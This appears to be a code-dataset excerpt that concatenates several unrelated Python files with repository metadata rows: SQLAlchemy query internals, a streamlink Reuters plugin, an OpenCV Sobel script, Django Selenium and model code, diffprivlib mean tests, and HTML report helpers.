            ezero = ent.entity_zero_or_selectable
            if ezero is not None:
                return ezero
        else:
            return None

    def adapt_to_selectable(self, query, sel):
        c = _BundleEntity(query, self.bundle, setup_entities=False)
        # c._label_name = self._label_name
        # c.entity_zero = self.entity_zero
        # c.entities = self.entities

        for ent in self._entities:
            ent.adapt_to_selectable(c, sel)

    def setup_entity(self, ext_info, aliased_adapter):
        for ent in self._entities:
            ent.setup_entity(ext_info, aliased_adapter)

    def setup_context(self, query, context):
        for ent in self._entities:
            ent.setup_context(query, context)

    def row_processor(self, query, context, result):
        # collect each member's (processor, label), then let the Bundle
        # combine them into a single row-processing callable.
        procs, labels = zip(
            *[ent.row_processor(query, context, result)
              for ent in self._entities]
        )

        proc = self.bundle.create_row_processor(query, procs, labels)

        return proc, self._label_name
class _ColumnEntity(_QueryEntity):
    """Column/expression based entity."""

    def __init__(self, query, column, namespace=None):
        self.expr = column
        self.namespace = namespace
        search_entities = True
        check_column = False

        if isinstance(column, util.string_types):
            # plain string -> literal column expression.
            column = sql.literal_column(column)
            self._label_name = column.name
            search_entities = False
            check_column = True
            _entity = None
        elif isinstance(column, (
                attributes.QueryableAttribute,
                interfaces.PropComparator
        )):
            # ORM attribute - its parent entity is known directly, so
            # no annotation search is required.
            _entity = getattr(column, '_parententity', None)
            if _entity is not None:
                search_entities = False
            self._label_name = column.key
            column = column._query_clause_element()
            check_column = True
            if isinstance(column, Bundle):
                _BundleEntity(query, column)
                return

        if not isinstance(column, sql.ColumnElement):
            if hasattr(column, '_select_iterable'):
                # break out an object like Table into
                # individual columns
                for c in column._select_iterable:
                    if c is column:
                        break
                    _ColumnEntity(query, c, namespace=column)
                else:
                    # for/else: no break occurred, i.e. the object
                    # expanded into distinct columns - we're done.
                    return

            raise sa_exc.InvalidRequestError(
                "SQL expression, column, or mapped entity "
                "expected - got '%r'" % (column, )
            )
        elif not check_column:
            self._label_name = getattr(column, 'key', None)
            search_entities = True

        self.type = type_ = column.type
        self.use_id_for_hash = not type_.hashable

        # If the Column is unnamed, give it a
        # label() so that mutable column expressions
        # can be located in the result even
        # if the expression's identity has been changed
        # due to adaption.
        if not column._label and not getattr(column, 'is_literal', False):
            column = column.label(self._label_name)

        query._entities.append(self)

        self.column = column
        self.froms = set()

        # look for ORM entities represented within the
        # given expression.  Try to count only entities
        # for columns whose FROM object is in the actual list
        # of FROMs for the overall expression - this helps
        # subqueries which were built from ORM constructs from
        # leaking out their entities into the main select construct
        self.actual_froms = actual_froms = set(column._from_objects)

        if not search_entities:
            self.entity_zero = _entity
            if _entity:
                self.entities = [_entity]
                self.mapper = _entity.mapper
            else:
                self.entities = []
                self.mapper = None
            self._from_entities = set(self.entities)
        else:
            all_elements = [
                elem for elem in sql_util.surface_column_elements(
                    column, include_scalar_selects=False)
                if 'parententity' in elem._annotations
            ]

            self.entities = util.unique_list([
                elem._annotations['parententity']
                for elem in all_elements
                if 'parententity' in elem._annotations
            ])

            self._from_entities = set([
                elem._annotations['parententity']
                for elem in all_elements
                if 'parententity' in elem._annotations
                and actual_froms.intersection(elem._from_objects)
            ])
            if self.entities:
                self.entity_zero = self.entities[0]
                self.mapper = self.entity_zero.mapper
            elif self.namespace is not None:
                # e.g. member of a Bundle; the bundle acts as namespace.
                self.entity_zero = self.namespace
                self.mapper = None
            else:
                self.entity_zero = None
                self.mapper = None

    supports_single_entity = False

    @property
    def entity_zero_or_selectable(self):
        if self.entity_zero is not None:
            return self.entity_zero
        elif self.actual_froms:
            return list(self.actual_froms)[0]
        else:
            return None

    def adapt_to_selectable(self, query, sel):
        c = _ColumnEntity(query, sel.corresponding_column(self.column))
        c._label_name = self._label_name
        c.entity_zero = self.entity_zero
        c.entities = self.entities

    def setup_entity(self, ext_info, aliased_adapter):
        if 'selectable' not in self.__dict__:
            self.selectable = ext_info.selectable

        if self.actual_froms.intersection(ext_info.selectable._from_objects):
            self.froms.add(ext_info.selectable)

    def corresponds_to(self, entity):
        # TODO: just returning False here,
        # no tests fail
        if self.entity_zero is None:
            return False
        elif _is_aliased_class(entity):
            # TODO: polymorphic subclasses ?
            return entity is self.entity_zero
        else:
            return not _is_aliased_class(self.entity_zero) and \
                entity.common_parent(self.entity_zero)

    def row_processor(self, query, context, result):
        # reuse the column cached by setup_context() when available, so
        # the same adapted column object is used for the result getter.
        if ('fetch_column', self) in context.attributes:
            column = context.attributes[('fetch_column', self)]
        else:
            column = query._adapt_clause(self.column, False, True)

        if context.adapter:
            column = context.adapter.columns[column]

        getter = result._getter(column)
        return getter, self._label_name

    def setup_context(self, query, context):
        column = query._adapt_clause(self.column, False, True)
        context.froms += tuple(self.froms)
        context.primary_columns.append(column)

        # remember the adapted column for row_processor().
        context.attributes[('fetch_column', self)] = column

    def __str__(self):
        return str(self.column)
class QueryContext(object):
    """Mutable state carried through the compilation and result-loading
    phases of a single :class:`.Query` execution."""

    __slots__ = (
        'multi_row_eager_loaders', 'adapter', 'froms', 'for_update',
        'query', 'session', 'autoflush', 'populate_existing',
        'invoke_all_eagers', 'version_check', 'refresh_state',
        'primary_columns', 'secondary_columns', 'eager_order_by',
        'eager_joins', 'create_eager_joins', 'propagate_options',
        'attributes', 'statement', 'from_clause', 'whereclause',
        'order_by', 'labels', '_for_update_arg', 'runid', 'partials',
        'post_load_paths', 'identity_token'
    )

    def __init__(self, query):

        if query._statement is not None:
            # from_statement() case: use the given statement, applying
            # labels to a plain un-labeled SELECT.
            if isinstance(query._statement, expression.SelectBase) and \
                    not query._statement._textual and \
                    not query._statement.use_labels:
                self.statement = query._statement.apply_labels()
            else:
                self.statement = query._statement
        else:
            # statement is produced later by Query._compile_context().
            self.statement = None
            self.from_clause = query._from_obj
            self.whereclause = query._criterion
            self.order_by = query._order_by

        self.multi_row_eager_loaders = False
        self.adapter = None
        self.froms = ()
        self.for_update = None
        self.query = query
        self.session = query.session
        self.autoflush = query._autoflush
        self.populate_existing = query._populate_existing
        self.invoke_all_eagers = query._invoke_all_eagers
        self.version_check = query._version_check
        self.refresh_state = query._refresh_state
        self.primary_columns = []
        self.secondary_columns = []
        self.eager_order_by = []
        self.eager_joins = {}
        self.create_eager_joins = []
        # loader options that should propagate to lazy loads.
        self.propagate_options = set(o for o in query._with_options if
                                     o.propagate_to_loaders)
        self.attributes = query._attributes.copy()
        if self.refresh_state is not None:
            self.identity_token = query._refresh_identity_token
        else:
            self.identity_token = None
class AliasOption(interfaces.MapperOption):
    """MapperOption indicating the Query's main table has been aliased."""

    def __init__(self, alias):
        r"""Return a :class:`.MapperOption` that will indicate to the :class:`.Query`
        that the main table has been aliased.

        This is a seldom-used option to suit the
        very rare case that :func:`.contains_eager`
        is being used in conjunction with a user-defined SELECT
        statement that aliases the parent table.  E.g.::

            # define an aliased UNION called 'ulist'
            ulist = users.select(users.c.user_id==7).\
                    union(users.select(users.c.user_id>7)).\
                    alias('ulist')

            # add on an eager load of "addresses"
            statement = ulist.outerjoin(addresses).\
                select().apply_labels()

            # create query, indicating "ulist" will be an
            # alias for the main table, "addresses"
            # property should be eager loaded
            query = session.query(User).options(
                contains_alias(ulist),
                contains_eager(User.addresses))

            # then get results via the statement
            results = query.from_statement(statement).all()

        :param alias: is the string name of an alias, or a
         :class:`~.sql.expression.Alias` object representing
         the alias.

        """
        self.alias = alias

    def process_query(self, query):
        # a string alias name is resolved against the query's primary
        # mapped table; an Alias object is used directly.
        if isinstance(self.alias, util.string_types):
            alias = query._mapper_zero().mapped_table.alias(self.alias)
        else:
            alias = self.alias
        query._from_obj_alias = sql_util.ColumnAdapter(alias)
| 37.200552 | 102 | 0.596236 |
6553d2f7a1f6788c9eab7c70882c8f6861f46714 | 463 | py | Python | hktm/lesson_contents/RenderContent_K362.py | karlneco/kanji-test-maker | de0ae52d8de28fe81be2ec49018acf1ad0f2308e | [
"MIT"
] | 2 | 2019-12-11T07:09:57.000Z | 2020-02-02T23:34:51.000Z | hktm/lesson_contents/RenderContent_K362.py | karlneco/kanji-test-maker | de0ae52d8de28fe81be2ec49018acf1ad0f2308e | [
"MIT"
] | 1 | 2021-10-04T05:59:17.000Z | 2021-10-04T05:59:17.000Z | hktm/lesson_contents/RenderContent_K362.py | karlneco/kanji-test-maker | de0ae52d8de28fe81be2ec49018acf1ad0f2308e | [
"MIT"
] | null | null | null | from hktm.lesson_contents.RenderContent_KT36 import RenderContentKT36
from yattag import Doc
class RenderContentK362(RenderContentKT36):
    """Renderer for the K362 kanji-test content variant."""
    def __init__(self, question_bundle):
        """Initialise the base KT36 renderer, then set K362-specific sizes."""
        super().__init__(question_bundle)
        # Per-output-mode sizing consumed by the rendering templates.
        self.render_mode = dict(pdf='90px', preview='80')
| 28.9375 | 80 | 0.557235 |
c1f5c366b3d15429d43775f7a7fb25d748f46729 | 3,219 | py | Python | src/streamlink/plugins/reuters.py | melmorabity/streamlink | 24c59a23103922977991acc28741a323d8efa7a1 | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/reuters.py | melmorabity/streamlink | 24c59a23103922977991acc28741a323d8efa7a1 | [
"BSD-2-Clause"
] | null | null | null | src/streamlink/plugins/reuters.py | melmorabity/streamlink | 24c59a23103922977991acc28741a323d8efa7a1 | [
"BSD-2-Clause"
] | null | null | null | import logging
import re
from streamlink.plugin import Plugin, PluginError, pluginmatcher
from streamlink.plugin.api import validate
from streamlink.stream import HLSStream
log = logging.getLogger(__name__)
@pluginmatcher(re.compile(
r'https?://([\w-]+\.)*reuters\.(com|tv)'
))
class Reuters(Plugin):
_re_fusion_global_content = re.compile(r"Fusion\s*\.\s*globalContent\s*=\s*(?P<json>{.+?})\s*;\s*Fusion\s*\.", re.DOTALL)
_re_fusion_content_cache = re.compile(r"Fusion\s*\.\s*contentCache\s*=\s*(?P<json>{.+?})\s*;\s*Fusion\s*\.", re.DOTALL)
def _get_data(self):
root = self.session.http.get(self.url, schema=validate.Schema(
validate.parse_html()
))
try:
log.debug("Trying to find source via meta tag")
schema = validate.Schema(
validate.xml_xpath_string(".//meta[@property='og:video'][1]/@content"),
validate.url()
)
return schema.validate(root)
except PluginError:
pass
try:
log.debug("Trying to find source via next-head")
schema = validate.Schema(
validate.xml_findtext(".//script[@type='application/ld+json'][@class='next-head']"),
validate.parse_json(),
{"contentUrl": validate.url()},
validate.get("contentUrl")
)
return schema.validate(root)
except PluginError:
pass
schema_fusion = validate.xml_findtext(".//script[@type='application/javascript'][@id='fusion-metadata']")
schema_video = validate.all(
{"source": {"hls": validate.url()}},
validate.get(("source", "hls"))
)
try:
log.debug("Trying to find source via fusion-metadata globalContent")
schema = validate.Schema(
schema_fusion,
validate.transform(self._re_fusion_global_content.search),
validate.get("json"),
validate.parse_json(),
{"result": {"related_content": {"videos": list}}},
validate.get(("result", "related_content", "videos", 0)),
schema_video
)
return schema.validate(root)
except PluginError:
pass
try:
log.debug("Trying to find source via fusion-metadata contentCache")
schema = validate.Schema(
schema_fusion,
validate.transform(self._re_fusion_content_cache.search),
validate.get("json"),
validate.parse_json(),
{"videohub-by-guid-v1": {str: {"data": {"result": {"videos": list}}}}},
validate.get("videohub-by-guid-v1"),
validate.transform(lambda obj: obj[list(obj.keys())[0]]),
validate.get(("data", "result", "videos", 0)),
schema_video
)
return schema.validate(root)
except PluginError:
pass
def _get_streams(self):
hls_url = self._get_data()
if hls_url:
return HLSStream.parse_variant_playlist(self.session, hls_url)
__plugin__ = Reuters
| 36.168539 | 125 | 0.559491 |
b049d472c87039837e1eb8b9095d20454f87c7a4 | 314 | py | Python | Chapter07/codes/sobel.py | atpost/Computer-Vision-with-Python-3 | cb4c0c5d88b6cd291b5fff5c4a91f605d8b0f3c0 | [
"MIT"
] | 60 | 2017-09-12T16:38:00.000Z | 2022-03-28T15:24:37.000Z | Chapter07/codes/sobel.py | atpost/Computer-Vision-with-Python-3 | cb4c0c5d88b6cd291b5fff5c4a91f605d8b0f3c0 | [
"MIT"
] | 1 | 2020-03-02T16:10:56.000Z | 2020-07-30T05:12:10.000Z | Chapter07/codes/sobel.py | atpost/Computer-Vision-with-Python-3 | cb4c0c5d88b6cd291b5fff5c4a91f605d8b0f3c0 | [
"MIT"
] | 62 | 2017-09-06T09:18:42.000Z | 2022-03-24T14:34:45.000Z | import cv2
img = cv2.imread("image.jpg")
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
x_edges = cv2.Sobel(gray,-1,1,0,ksize=5)
cv2.imwrite("sobel_edges_x.jpg", x_edges)
y_edges = cv2.Sobel(gray,-1,0,1,ksize=5)
cv2.imwrite("sobel_edges_y.jpg", y_edges)
cv2.imshow("xedges", x_edges)
cv2.imshow("yedges", y_edges)
| 31.4 | 44 | 0.732484 |
5294c83c40c73c02bbbd8b0d1c95386d3dc05924 | 3,452 | py | Python | main/courses/videos/tests/test_views_selenium.py | csev/class2go | f9419ae16448d20fc882170f95cfd1c4dc3331ca | [
"Apache-2.0"
] | 2 | 2015-10-31T23:12:52.000Z | 2021-01-19T11:03:00.000Z | main/courses/videos/tests/test_views_selenium.py | sunu/class2go | 653b1edd01d390ad387dd788e0fc2d89445fbcab | [
"Apache-2.0"
] | null | null | null | main/courses/videos/tests/test_views_selenium.py | sunu/class2go | 653b1edd01d390ad387dd788e0fc2d89445fbcab | [
"Apache-2.0"
] | null | null | null | from django.core.urlresolvers import reverse
from lxml import etree
from nose.plugins.attrib import attr
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from test_harness.test_base_selenium import InstructorBase, StudentBase
def DEBUG(s):
"""A useful method for adding tracing to help figure out why tests go bad
Particularly helpful for working with remote test services that capture
output, like travis-ci."""
import sys
sys.stderr.write(s)
class InstructorVideoTest(InstructorBase):
@attr('selenium')
@attr(user='instructor')
def test_course_video_problem_set(self):
"""[sel] Test an instructor can load and display a video problemset"""
# log in to the site before loading a page
self.do_login()
browser = self.browser
# load the problem set for video 4
list_url = reverse('course_video_pset',
kwargs={'course_prefix' : self.course_prefix,
'course_suffix' : self.course_suffix,
'video_id' : 4 })
browser.get('%s%s' % (self.live_server_url, list_url))
WebDriverWait(browser, 15).until(lambda browser : browser.find_element_by_xpath('//body'))
# make sure we have an exercise div
self.assertTrue(browser.find_element_by_xpath('//div[contains(@class, "exercise")]'))
# pull the data-name attributes from exercise divs
tree = etree.HTML(browser.page_source)
result = tree.xpath('//div[contains(@class, "exercise")]/@data-name')
# check that we got the right number of exercises - TODO: use the ORM to get the count
self.assertEqual(len(result), 1, msg="Unexpected number of divs with data.")
# check that we got the right exercise - TODO: use the ORM to get the name
self.assertEqual('xx_P1_Regexp', result[0])
class StudentVideoTest(StudentBase):
@attr('selenium')
@attr(user='student')
def test_course_video(self):
"""[sel] Tests that a student can display an individual video"""
self.do_login()
browser = self.browser
# get the list of videos
list_url = reverse('course_video_list',
kwargs={'course_prefix' : self.course_prefix,
'course_suffix' : self.course_suffix })
browser.get('%s%s' % (self.live_server_url, list_url))
WebDriverWait(browser, 15).until(lambda browser : browser.find_element_by_xpath('//body'))
# pull the urls of each video from the in-page list
tree = etree.HTML(browser.page_source)
# pull the href from the anchor contained in the course-list-content
urls = tree.xpath('//div[@class="course-list-content"]//a/@href')
self.assertEqual(len(urls), 3, msg="Wrong number of live videos.")
url = urls[1] # An essentially random, yet reproducible, choice
browser.get('%s%s' % (self.live_server_url, url))
# When loaded we should have an iframe that contains the youtube content
WebDriverWait(browser, 15).until(lambda browser : browser.find_element_by_tag_name('iframe'))
# switch to the iframe for the youtube player and find the embeded player
browser.switch_to_frame(browser.find_element_by_tag_name('iframe'))
self.assertTrue(browser.find_element_by_xpath('//embed[@id="video-player"]'))
| 45.421053 | 101 | 0.659328 |
48d1830c47042a8cc7473d35bdff72f78ecba625 | 1,709 | py | Python | tests/tools/test_mean.py | Jakondak/differential-privacy-library | c26bab301f2554b52c8bd836b28091f2f2611cd4 | [
"MIT"
] | 1 | 2020-05-03T06:06:44.000Z | 2020-05-03T06:06:44.000Z | tests/tools/test_mean.py | dohmatob/differential-privacy-library | 1a17bf0e3bf7d18d5c19258abbf81c27fd9a5e16 | [
"MIT"
] | null | null | null | tests/tools/test_mean.py | dohmatob/differential-privacy-library | 1a17bf0e3bf7d18d5c19258abbf81c27fd9a5e16 | [
"MIT"
] | 1 | 2022-01-02T11:29:30.000Z | 2022-01-02T11:29:30.000Z | from unittest import TestCase
import numpy as np
from diffprivlib.tools.utils import mean
from diffprivlib.utils import PrivacyLeakWarning
class TestMean(TestCase):
    """Unit tests for the differentially private mean() utility."""

    def test_not_none(self):
        self.assertIsNotNone(mean)

    def test_no_params(self):
        arr = np.array([1, 2, 3])
        # Calling without epsilon/range must warn about a privacy leak
        # but still produce a value.
        with self.assertWarns(PrivacyLeakWarning):
            result = mean(arr)
        self.assertIsNotNone(result)

    def test_no_epsilon(self):
        arr = np.array([1, 2, 3])
        self.assertIsNotNone(mean(arr, range=1))

    def test_no_range(self):
        arr = np.array([1, 2, 3])
        with self.assertWarns(PrivacyLeakWarning):
            result = mean(arr, epsilon=1)
        self.assertIsNotNone(result)

    def test_negative_range(self):
        arr = np.array([1, 2, 3])
        with self.assertRaises(ValueError):
            mean(arr, epsilon=1, range=-1)

    def test_missing_range(self):
        arr = np.array([1, 2, 3])
        with self.assertWarns(PrivacyLeakWarning):
            result = mean(arr, epsilon=1, range=None)
        self.assertIsNotNone(result)

    def test_large_epsilon(self):
        # With epsilon=1 over 1000 samples the noisy mean should sit
        # very close to the exact mean.
        arr = np.random.random(1000)
        exact = float(np.mean(arr))
        noisy = mean(arr, epsilon=1, range=1)
        self.assertAlmostEqual(exact, noisy, delta=0.01)

    def test_large_epsilon_axis(self):
        arr = np.random.random((1000, 5))
        exact = np.mean(arr, axis=0)
        noisy = mean(arr, epsilon=1, range=1, axis=0)
        for expected, got in zip(exact, noisy):
            self.assertAlmostEqual(expected, got, delta=0.01)

    def test_nan(self):
        # A NaN anywhere in the input should propagate to the result.
        arr = np.random.random((5, 5))
        arr[2, 2] = np.nan
        self.assertTrue(np.isnan(mean(arr, range=1)))
| 27.564516 | 65 | 0.597425 |
3abefd360896c2c57f6387256de13e37952a314e | 9,229 | py | Python | decision reasoning/profiling report/temp_list/div.py | kidrabit/Data-Visualization-Lab-RND | baa19ee4e9f3422a052794e50791495632290b36 | [
"Apache-2.0"
] | 1 | 2022-01-18T01:53:34.000Z | 2022-01-18T01:53:34.000Z | decision reasoning/profiling report/temp_list/div.py | kidrabit/Data-Visualization-Lab-RND | baa19ee4e9f3422a052794e50791495632290b36 | [
"Apache-2.0"
] | null | null | null | decision reasoning/profiling report/temp_list/div.py | kidrabit/Data-Visualization-Lab-RND | baa19ee4e9f3422a052794e50791495632290b36 | [
"Apache-2.0"
def input_query_div(cnt_create, attributes, tasks, visType):
    """Return the HTML row for one input query: a table listing its
    attributes/tasks/visType next to an (initially empty) vlSpec container.

    `cnt_create` numbers the outer container id ("visN").
    """
    # f-string interpolation replaces the original chain of '''...''' + str(...)
    # concatenations; the emitted markup is identical.
    return f'''
    <div id="vis{cnt_create}" style="display: flex; height: 250px; margin-bottom: 5px; border: 3px solid #74788D;">
        <div id="list">
            <table>
                <tr>
                    <th>attributes</th>
                    <td>{attributes}</td>
                </tr>
                <tr>
                    <th>tasks</th>
                    <td>{tasks}</td>
                </tr>
                <tr>
                    <th>visType</th>
                    <td>{visType}</td>
                </tr>
            </table>
        </div>
        <div id="vlSpec"></div>
    </div>
    '''
def current_div(cnt_create, name, children_node, action, output, output_percent, output_sign):
    """Build the HTML for the 'current node' panel of the profiling report.

    Renders the current node circle (`name`), two bar-chart placeholders,
    and three recommendation rows - one per entry of `children_node` /
    `action`. Each row shows three issue gauges (missing values, extreme
    values, combined count): `output[i][j]` is the displayed count,
    `output_percent[i][j]` the gauge fill width, and `output_sign[i][j]`
    the trend text appended after each gauge. `cnt_create` numbers the
    outer container id ("visN").
    """
    # NOTE: the markup is assembled by string concatenation; the odd
    # '''100%''' + ''' 100%''' splices keep literal percent signs separate
    # from the interpolated width values - do not "simplify" them.
    div = '''
    <div id="vis''' + str(cnt_create) + '''" style="display: flex; height: 250px; margin-bottom: 5px; border: 3px solid #74788D;">
        <div id="node" style="width: 30px; height: 30px; margin: 5px; text-align: center; border: 2px solid black; border-radius: 50%; line-height: 30px;">''' + name + '''</div>
        <div id="bar1" style="width: 25%; border-right: 3px solid #F2F2F5;"></div>
        <div id="bar2" style="width: 25%; border-right: 3px solid #F2F2F5;"></div>
        <div id="recommend" style="width: 40%;">
            <div id="recommend1" style="display: flex; width: 100%; height: 20%;">
                <div id="recommend_node1" style="width: 30px; height: 30px; margin: 5px; color: white; background-color: #47597E; text-align: center; border: 2px solid black; border-radius: 50%; line-height: 30px;">''' + children_node[0].name + '''</div>
                <div id="recommend_list1" style="width: 100%; height: 100%; margin: 5px; background-color: #DBE6FD; text-align: left; border: 2px solid; border-radius: 5px;">
                    ''' + action[0] + '''
                    <div id="issue" style="display: flex;">
                        결측 값 개수
                        <div id="issue1" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
                            <div id="issue1_inner" style="width: ''' + str(output_percent[0][0]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #f37021 0%, #FFCDD2 100%);">''' + str(output[0][0]) + '''</div>
                        </div>
                        '''+ output_sign[0][0] + ''', 극단 값 개수
                        <div id="issue2" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
                            <div id="issue2_inner" style="width: ''' + str(output_percent[0][1]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #4CAF50 0%, #C8E6C9 100%);">''' + str(output[0][1]) + '''</div>
                        </div>
                        '''+ output_sign[0][1] + ''', 통합 개수
                        <div id="issue3" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
                            <div id="issue3_inner" style="width: ''' + str(output_percent[0][2]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #2196F3 0%, #BBDEFB 100%);">''' + str(output[0][2]) + '''</div>
                        </div>
                        '''+ output_sign[0][2] + '''
                    </div>
                </div>
            </div>
            <br>
            <div id="recommend2" style="display: flex; width: 100%; height: 20%;">
                <div id="recommend_node2" style="width: 30px; height: 30px; margin: 5px; background-color: lightgray; text-align: center; border: 2px solid; border-radius: 50%; line-height: 30px;">''' + children_node[1].name + '''</div>
                <div id="recommend_list2" style="width: 100%; height: 100%; margin: 5px; background-color: lightgray; text-align: left; border: 2px solid; border-radius: 5px;">
                    ''' + action[1] + '''
                    <div id="issue" style="display: flex;">
                        결측 값 개수
                        <div id="issue1" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
                            <div id="issue1_inner" style="width: ''' + str(output_percent[1][0]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #f37021 0%, #FFCDD2 100%);">''' + str(output[1][0]) + '''</div>
                        </div>
                        '''+ output_sign[1][0] + ''', 극단 값 개수
                        <div id="issue2" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
                            <div id="issue2_inner" style="width: ''' + str(output_percent[1][1]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #4CAF50 0%, #C8E6C9 100%);">''' + str(output[1][1]) + '''</div>
                        </div>
                        '''+ output_sign[1][1] + ''', 통합 개수
                        <div id="issue3" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
                            <div id="issue3_inner" style="width: ''' + str(output_percent[1][2]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #2196F3 0%, #BBDEFB 100%);">''' + str(output[1][2]) + '''</div>
                        </div>
                        '''+ output_sign[1][2] + '''
                    </div>
                </div>
            </div>
            <br>
            <div id="recommend3" style="display: flex; width: 100%; height: 20%;">
                <div id="recommend_node3" style="width: 30px; height: 30px; margin: 5px; background-color: lightgray; text-align: center; border: 2px solid; border-radius: 50%; line-height: 30px;">''' + children_node[2].name + '''</div>
                <div id="recommend_list3" style="width: 100%; height: 100%; margin: 5px; background-color: lightgray; text-align: left; border: 2px solid; border-radius: 5px;">
                    ''' + action[2] + '''
                    <div id="issue" style="display: flex;">
                        결측 값 개수
                        <div id="issue1" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
                            <div id="issue1_inner" style="width: ''' + str(output_percent[2][0]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #f37021 0%, #FFCDD2 100%);">''' + str(output[2][0]) + '''</div>
                        </div>
                        '''+ output_sign[2][0] + ''', 극단 값 개수
                        <div id="issue2" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
                            <div id="issue2_inner" style="width: ''' + str(output_percent[2][1]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #4CAF50 0%, #C8E6C9 100%);">''' + str(output[2][1]) + '''</div>
                        </div>
                        '''+ output_sign[2][1] + ''', 통합 개수
                        <div id="issue3" style="width: 10%; height: 20px; background-color: white; border: 2px solid;">
                            <div id="issue3_inner" style="width: ''' + str(output_percent[2][2]) + '''%; height: 20px; background-size: 100%''' + ''' 100%; text-align: center; background-image: linear-gradient(90deg, #2196F3 0%, #BBDEFB 100%);">''' + str(output[2][2]) + '''</div>
                        </div>
                        '''+ output_sign[2][2] + '''
                    </div>
                </div>
            </div>
        </div>
    </div>
    '''
    return div
def recommend_div(cnt_create, name):
    """Return the HTML row comparing before/after heatmaps and histograms
    for the recommended node `name`; `cnt_create` numbers the container id."""
    # f-string form of the original string-concatenation; output is identical.
    return f'''
    <div id="vis{cnt_create}" style="display: flex; height: 250px; margin-bottom: 5px; border: 3px solid #74788D;">
        <div id="node" style="width: 30px; height: 30px; margin: 5px; text-align: center; border: 2px solid black; border-radius: 50%; line-height: 30px;">{name}</div>
        <div id="heatmap_before" style="width: 25%; border-right: 3px solid #F2F2F5;"></div>
        <div id="heatmap_after" style="width: 25%; border-right: 3px solid #F2F2F5;"></div>
        <div id="histogram_before" style="width: 20%; border-right: 3px solid #F2F2F5;"></div>
        <div id="histogram_after" style="width: 20%;"></div>
    </div>
    '''
0a20476ac032f075e17884970df9ef15cdca109c | 4,491 | py | Python | models.py | sharan-amutharasu/game-doble | f8f8e9c29b50b89e170d4f8019f9244b4f1f197f | [
"MIT"
] | null | null | null | models.py | sharan-amutharasu/game-doble | f8f8e9c29b50b89e170d4f8019f9244b4f1f197f | [
"MIT"
] | null | null | null | models.py | sharan-amutharasu/game-doble | f8f8e9c29b50b89e170d4f8019f9244b4f1f197f | [
"MIT"
] | null | null | null | from django.db import models
# Create your models here.
#add_to_end: 2017-08-24 08:42:19.063507
from django.urls import reverse #Used to generate URLs by reversing the URL patterns
import uuid # Required for unique book instances
from django.contrib.auth.models import User
from datetime import datetime
#add_to_end: 2017-08-24 08:45:15.134057
#model:mt_game
class mt_game(models.Model):
    """A Doble game session: room settings, three player seats with their
    timing/progress counters, and the shared card sets for the round."""
    #mt_ball.fields
    # NOTE(review): the "#mt_ball.*" section markers look copy-pasted from
    # another model; kept as-is.
    # Room identity and access.
    f_game_name = models.CharField(primary_key=False, max_length=100, default="dgame")
    f_game_size = models.IntegerField(default = 2)
    f_game_password = models.CharField(max_length = 20, default="password")
    # One display name per seat (up to three players).
    f_player1 = models.CharField(max_length=100)
    f_player2 = models.CharField(max_length=100)
    f_player3 = models.CharField(max_length=100)
    # Per-seat timing: when the player started and accumulated play time.
    f_p1_start_time = models.DateTimeField(default = datetime.now)
    f_p2_start_time = models.DateTimeField(default = datetime.now)
    f_p3_start_time = models.DateTimeField(default = datetime.now)
    f_p1_play_time = models.IntegerField(default = 0)
    f_p2_play_time = models.IntegerField(default = 0)
    f_p3_play_time = models.IntegerField(default = 0)
    # Per-seat state flags stored as 0/1 integers (waiting/started/stopped).
    f_p1_waiting = models.IntegerField(default = 0)
    f_p2_waiting = models.IntegerField(default = 0)
    f_p3_waiting = models.IntegerField(default = 0)
    f_p1_started = models.IntegerField(default = 0)
    f_p2_started = models.IntegerField(default = 0)
    f_p3_started = models.IntegerField(default = 0)
    f_p1_stopped = models.IntegerField(default = 0)
    f_p2_stopped = models.IntegerField(default = 0)
    f_p3_stopped = models.IntegerField(default = 0)
    # Per-seat progress counters.
    f_p1_cards_played = models.IntegerField(default = 0)
    f_p2_cards_played = models.IntegerField(default = 0)
    f_p3_cards_played = models.IntegerField(default = 0)
    # Shared round state: key card, per-player sets, current play and winner.
    f_key = models.CharField(max_length=100, default="none")
    f_set1 = models.CharField(max_length=100, default="none")
    f_set2 = models.CharField(max_length=100, default="none")
    f_set3 = models.CharField(max_length=100, default="none")
    f_play = models.CharField(max_length=100, default="none")
    f_winner = models.CharField(max_length=100, default="none")
    #mt_ball.meta
    class Meta:
        ordering = ['f_game_name']
    #mt_ball.methods
    def get_absolute_url(self):
        # Resolves the 'game2' URL pattern for this game's pk.
        return reverse('game2', args=[str(self.id)])
    def __str__(self):
        return self.f_game_name
#add_to_end: 2017-08-24 08:45:15.134090
#model:mt_deck
class mt_deck(models.Model):
    """One card of the Doble deck: eight symbol elements plus a display size
    for each, keyed by the card number."""
    #mt_deck.fields
    f_card_no = models.IntegerField(primary_key=True)
    # The eight symbols printed on this card.
    f_e1 = models.CharField(max_length=100)
    f_e2 = models.CharField(max_length=100)
    f_e3 = models.CharField(max_length=100)
    f_e4 = models.CharField(max_length=100)
    f_e5 = models.CharField(max_length=100)
    f_e6 = models.CharField(max_length=100)
    f_e7 = models.CharField(max_length=100)
    f_e8 = models.CharField(max_length=100)
    # Display size for the matching symbol above (f_eN_size goes with f_eN).
    f_e1_size = models.IntegerField()
    f_e2_size = models.IntegerField()
